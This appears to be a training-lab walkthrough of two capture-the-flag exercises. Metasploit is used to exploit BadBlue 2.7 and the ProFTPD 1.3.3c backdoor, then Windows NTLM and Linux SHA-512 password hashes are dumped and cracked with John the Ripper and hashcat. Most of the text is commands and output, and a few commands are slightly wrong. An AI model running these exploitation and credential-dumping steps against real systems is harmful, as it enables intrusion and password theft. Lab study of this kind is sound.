Lab 1 - Windows
🔬
NTLM Hashes dumping and cracking
Enumeration & Exploitation
nmap -sV -p 80 10.2.24.37
80/tcp open http BadBlue httpd 2.7
service postgresql start && msfconsole -q
search badblue
use exploit/windows/http/badblue_passthru
options
setg RHOSTS 10.2.24.37
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
get privs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
With the Administrator Meterpreter session, privilege escalation is not necessary.
Migrate to the lsass process
pgrep lsass
migrate 688
# Meterpreter session is x64 and more stable now
Dumping Hashes
❗ In order to set up persistence, administrative privileges are required.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Open a new tab and create a .txt file with the dumped hashes. Paste the Administrator and bob hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Cracking Hashes
JohnTheRipper
In this case John The Ripper will be used as an example
john --list=formats | grep NT
netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, o10glogon
john --format=NT hashes.txt
# It will use the default wordlist
Use the rockyou.txt wordlist instead
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Hashcat
Crack NTLM hashes with hashcat brute-force
hashcat -a 3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -a 3 -m 1000 --show hashes.txt /usr/share/wordlists/rockyou.txt
8846f7eaee8fb117ad06bdd830b7586c:password
5835048ce94ad0564e29a924a03510ef:password1
xfreerdp /u:Administrator /p:password /v:10.2.24.37
Reveal Flag - Administrator's Password is: 🚩
Reveal Flag - bob's Password is: 🚩
Lab 2 - Linux
Password Hashes dumping and cracking
Enumeration & Exploitation
ip -br -c a
192.22.107.2/24
nmap -sV 192.22.107.3
21/tcp open ftp ProFTPD 1.3.3c
service postgresql start && msfconsole -q
setg RHOSTS 192.22.107.3
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor
exploit
Dumping Hashes
📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.
$6 = the hashing algorithm is SHA-512
An MSF module can be used for hash dumping
# CTRL+Z to background the session
sessions -u 1
session 2
use post/linux/gather/hashdump
set SESSION 2
run
cat /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt
root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
Cracking Hashes
JohnTheRipper
In this case John The Ripper will be used as an example
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=sha512crypt /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt --wordlist=/usr/share/wordlists/rockyou.txt
Hashcat
hashcat --help | grep 1800
1800 | sha512crypt $6$, SHA512 (Unix) | Operating Systems
hashcat -a 3 -m 1800 /root/.msf4/loot/20230429153134_default_192.22.107.3_linux.hashes_083080.txt /usr/share/wordlists/rockyou.txt
Reveal Flag - "root" user's password is: 🚩
